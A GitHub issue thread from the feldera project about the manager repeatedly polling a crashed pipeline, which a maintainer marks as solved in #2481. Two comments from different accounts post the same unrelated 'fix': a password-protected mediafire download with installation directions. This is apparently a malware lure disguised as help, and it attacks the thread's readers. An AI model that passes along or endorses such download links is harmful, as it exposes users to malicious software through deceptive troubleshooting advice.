### ISSUE TITLE
Constant polling by manager

### ISSUE THREAD

**Issue by mihaibudiu** [feldera/feldera#2342]
If a pipeline crashes at runtime (e.g., panic), the manager keeps polling it and logging errors.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ryzhyk** [comment]
Solved in #2481
